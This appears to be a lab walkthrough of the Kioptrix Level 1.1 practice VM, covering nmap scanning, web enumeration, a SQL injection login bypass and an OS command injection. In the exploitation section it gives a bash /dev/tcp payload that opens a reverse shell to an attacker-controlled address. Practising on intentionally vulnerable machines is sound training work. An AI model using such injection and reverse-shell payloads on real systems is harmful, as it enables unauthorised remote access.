KIOPTRIX: LEVEL 1.1 (#2) walkthrough
The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player 😜). The purpose…
The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player 😜). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more than one way to successfully complete the challenges.
Discovery
Find the Vuln machine using the netdiscover tool. We have to do this since we do not know the IP assigned to the Vuln Machine.
Enumeration
“Know the Enemy and Know Yourself”🔎
I always use the NMAP scan on all ports(-p-) cause we have to be sure we do not leave any minor details.
sudo nmap -p- -T4 -A 192.168.103.143
More Enumeration 💕
- 22|SSH
- 80|HTTP
- See the website and their Source Code.
The first thing comes to my mind when i see a login portal is SQLi 👻. Then, i might try default passwords such as admin:admin,admin:password,root:root.🤔
2. Always Nikto along side of Gobuster + dirb.
Possible ones to check are
- Apache + PHP < 5.3.12 / < 5.4.2 — cgi-bin Remote Code Execution🤔
- Apache < 2.2.34 / < 2.4.27 — OPTIONS Memory Leak🤔
- 111|rpcbind
- CUPS 1.1
Exploring Exploits
“Can you imagine what I would do if I could do all I can?” — Sun Tzu 🧙🏻♂️
I have listed all the possible point of attack from the previous steps.
- Apache + PHP < 5.3.12 / < 5.4.2 — cgi-bin Remote Code Execution
- Apache < 2.2.34 / < 2.4.27 — OPTIONS Memory Leak
- SQLi
Let’s try one by one 🤓…
- Apache + PHP < 5.3.12 / < 5.4.2 — cgi-bin Remote Code Execution
2. Apache < 2.2.34 / < 2.4.27 — OPTIONS Memory Leak
No luck here as well…😩
3. SQLi
- Creds: Administrator:’ OR 1 — -
It looks like we can go for OS command Injection. Let’s try 8.8.8.8;ls as the input.
Payload : 8.8.8.8 && bash -i >& /dev/tcp/192.168.103.182/4444 0>&1
Privilege Escalation
“There are not more than five musical notes, yet the combinations of these five give rise to more melodies than can ever be heard.There are not more than five primary colors, yet in combination they produce more hues than can ever been seen.There are not more than five cardinal tastes, yet combinations of them yield more flavors than can ever be tasted.” — Sun Tzu 🧙🏻♂️
Enumeration
Using the above info to find a kernel exploit.
Transfer the file to the Vuln machine…👻
“If the mind is willing, the flesh could go on and on without many things.” — Sun Tzu